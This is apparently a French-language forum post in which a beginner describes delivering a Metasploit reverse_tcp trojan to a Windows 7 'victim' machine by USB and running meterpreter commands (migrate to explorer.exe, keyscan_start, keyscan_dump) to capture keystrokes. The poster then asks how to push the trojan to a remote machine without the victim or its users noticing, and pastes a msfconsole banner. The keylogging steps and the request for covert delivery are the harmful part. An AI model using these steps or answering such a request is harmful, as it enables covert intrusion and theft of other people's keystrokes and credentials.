Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 13-07-2011 14:46:24

Hadley's_Hope
Membre

Metasploit (exploit.exe TO PC_victime)

Lu tout le monde,

Je suis débutant avec metasploit mais j'me débrouille.
Je suis en réseau local:       PC_attaquant(BT5_livecd)<-----RJ45----->PC_victime(win..7)
                                             192.168.1.10                                           192.168.1.20

J'utilise reverse_tcp pour le trojan "exploit.exe"
Je suis arrivé grace à une clé usb à transmettre le trojan et a terminer un tuto.
EDIT: tuto_video > migrate PID "explorer.exe; start notepad.exe; keyscan_start; keyscan_dump; puis pareille avec firefox.exe

Question 1> Dans les vidéo de BT4 il utilise la commande "use priv" sans problème or sous BT5 lorsque j'utilise la commande "use priv" BT5 me dit en gros que 'priv' a déjà été chargé (même apres avoir  fais msfupdate).
""use priv"" se charge t-il automatiquement sous BT5 lorsque la victime execute "exploit.exe"??

Question 2> comment transmettre le trojan "exploit.exe" à la machine distante sans se déplacer avec la clé usb et surtout sans que la victime (pc et utilisateurs) s'en rendent compte????

EDIT : si sa peut vous aider:

[email protected]:/pentest/exploits/framework3# ./msfconsole 

#    # ###### #####   ##    ####  #####  #       ####  # #####
##  ## #        #    #  #  #      #    # #      #    # #   #
# ## # #####    #   #    #  ####  #    # #      #    # #   #
#    # #        #   ######      # #####  #      #    # #   #
#    # #        #   #    # #    # #      #      #    # #   #
#    # ######   #   #    #  ####  #      ######  ####  #   #

=[ metasploit v3.8.0-dev [core:3.8 api:1.0]